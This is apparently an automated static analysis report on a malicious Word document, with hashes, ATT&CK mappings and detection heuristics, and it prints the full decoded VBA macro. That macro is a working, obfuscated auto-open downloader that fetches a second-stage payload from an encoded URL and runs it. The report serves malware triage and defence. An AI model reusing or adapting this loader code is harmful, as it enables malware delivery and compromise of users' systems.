Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 801e62ddcd256f1a…

MALICIOUS

Office (OLE)

36.5 KB Created: 2019-01-24 12:48:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 426ecb165a3386e2f319b2327a2f5a53 SHA-1: 6cd0bef592f5b08a7766fc25250a0346020783bd SHA-256: 801e62ddcd256f1aca61520881c30a006930914cd908bb732c60c837c814990d
360 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1071.001 Web Protocols

The sample contains obfuscated VBA macros that execute upon opening the document. These macros utilize the URLDownloadToFileA API to download a second-stage payload from a hardcoded URL and then execute it using CreateObject. This indicates a downloader or droppper functionality.

Heuristics 11

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Attribute VB_Customizable = True
    Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
    Sub Document_Open()
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
    Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
    p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
    Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
    p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
    Sub Document_Open()
    Hz9nTLRgw
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim p3lzLi85AKeDJ3Fx
    dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
    P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4674 bytes
SHA-256: 8161f102046c7caf14d3f29e4c90e7d20c6a1fb79708521ce492dd2a802828b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
45 of 88 identifiers look randomly generated (e.g. 'JMftNOuWtfOh9pi8W_smt') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
Sub Document_Open()
Hz9nTLRgw
End Sub
Sub Hz9nTLRgw()
Dim P6OcuF
Dim hGxsDgQQfRCA4d
Dim dpXyOdLN5Xk7rX
Dim p3lzLi85AKeDJ3Fx
dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
End Sub

Private Function MCk5jNez(l6iMNaGqPG As String, KLvOqFHtiFY As String) As String
On Error Resume Next
    Dim lTkmM(0 To 255) As Byte
    Dim GNwtrKSYY(0 To 255) As Byte
    Dim tb9O4HuUkNekQ1Jqah     As Byte
    Dim OmzSlVcPoG      As Long
    Dim hl5KQR6YxTYF2zdV      As Long
    Dim OmzSlVcPoGdx      As Long
    Dim prk1kspXxT8zeTE As String
    Dim zwZuFXIj As String
    Dim UbS12KlpsKiGj0K As Long
    
    For UbS12KlpsKiGj0K = 1 To Len(l6iMNaGqPG) Step 2
        prk1kspXxT8zeTE = Chr$(Val(b9UY4DO("&", "H") & Mid$(l6iMNaGqPG, UbS12KlpsKiGj0K, 2)))
        zwZuFXIj = zwZuFXIj & prk1kspXxT8zeTE
    Next UbS12KlpsKiGj0K
    
    l6iMNaGqPG = zwZuFXIj

    For OmzSlVcPoGdx = 0 To 255
      lTkmM(OmzSlVcPoGdx) = OmzSlVcPoGdx
      GNwtrKSYY(OmzSlVcPoGdx) = Asc(Mid$(KLvOqFHtiFY, 1 + (OmzSlVcPoGdx Mod Len(KLvOqFHtiFY)), 1))
    Next
    For OmzSlVcPoG = 0 To 255
      hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG) + GNwtrKSYY(OmzSlVcPoG)) Mod 256
      tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
      lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
      lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
    Next
    OmzSlVcPoG = 0
    hl5KQR6YxTYF2zdV = 0
    For OmzSlVcPoGdx = 1 To Len(l6iMNaGqPG)
      OmzSlVcPoG = (OmzSlVcPoG + 1) Mod 256
      hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG)) Mod 256
      tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
      lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
      lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
      MCk5jNez = MCk5jNez & Chr$((vs8i4ov(lTkmM((CLng(lTkmM(OmzSlVcPoG)) + lTkmM(hl5KQR6YxTYF2zdV)) Mod 256), Asc(Mid$(l6iMNaGqPG, OmzSlVcPoGdx, 1)))))
    Next
End Function
Private Function vs8i4ov(ByVal OmzSlVcPoG As Long, ByVal hl5KQR6YxTYF2zdV As Long) As Long
On Error Resume Next
    If OmzSlVcPoG = hl5KQR6YxTYF2zdV Then
      vs8i4ov = hl5KQR6YxTYF2zdV
    Else
      vs8i4ov = OmzSlVcPoG Xor hl5KQR6YxTYF2zdV
    End If
End Function

Function eXbnDKMvOhj(Hfr9620sTYhaxpLYEo As String, bjNjfg5VkxuB3Ws3A6 As String)
eXbnDKMvOhj = Hfr9620sTYhaxpLYEo + bjNjfg5VkxuB3Ws3A6
End Function
Function PDOCte(KaZnFX As String, rhpiC8f As String)
PDOCte = KaZnFX + rhpiC8f
End Function
Function FWjFM37eg(kAtwCT0WGuYNe45mB As String, MH1w8BVoNf2 As String)
FWjFM37eg = kAtwCT0WGuYNe45mB + MH1w8BVoNf2
End Function
Function rSdI2XFZR8T(lVCli9DueJ4JtgAV As String, c3Wk2BZjEklgedrE9 As String)
rSdI2XFZR8T = lVCli9DueJ4JtgAV + c3Wk2BZjEklgedrE9
End Function
Function jES4Wyj0(rRINcxXRADh2S000l As String, V1iKd2TPSDzgD5 As String)
jES4Wyj0 = rRINcxXRADh2S000l + V1iKd2TPSDzgD5
End Function
Function Fg2oaYYH(sI4UFQYCb0L1BHkg As String, sEi75WnGtDVKRU As String)
Fg2oaYYH = sI4UFQYCb0L1BHkg + sEi75WnGtDVKRU
End Function
Function b9UY4DO(cIahv As String, VCwo6JI0I7hW As String)
b9UY4DO = cIahv + VCwo6JI0I7hW
End Function
Function dyVR7(oyMcmlHEMD As String) As String
    Dim YwfEtoOry0(1055) As Byte
    Dim Jkq3Y1LFGMVu8N9() As Byte
    Dim nzFwEZgadUlgCb32
    Dim S51G9FNk4y31Wr
    Jkq3Y1LFGMVu8N9 = StrConv(oyMcmlHEMD, vbFromUnicode)
    For S51G9FNk4y31Wr = 0 To UBound(Jkq3Y1LFGMVu8N9) - 1
        If (S51G9FNk4y31Wr Mod 5 = 0) Then
            YwfEtoOry0(nzFwEZgadUlgCb32) = Jkq3Y1LFGMVu8N9(S51G9FNk4y31Wr)
            nzFwEZgadUlgCb32 = nzFwEZgadUlgCb32 + 1
        End If
    Next S51G9FNk4y31Wr
    dyVR7 = Left(StrConv(YwfEtoOry0, vbUnicode), nzFwEZgadUlgCb32)
End Function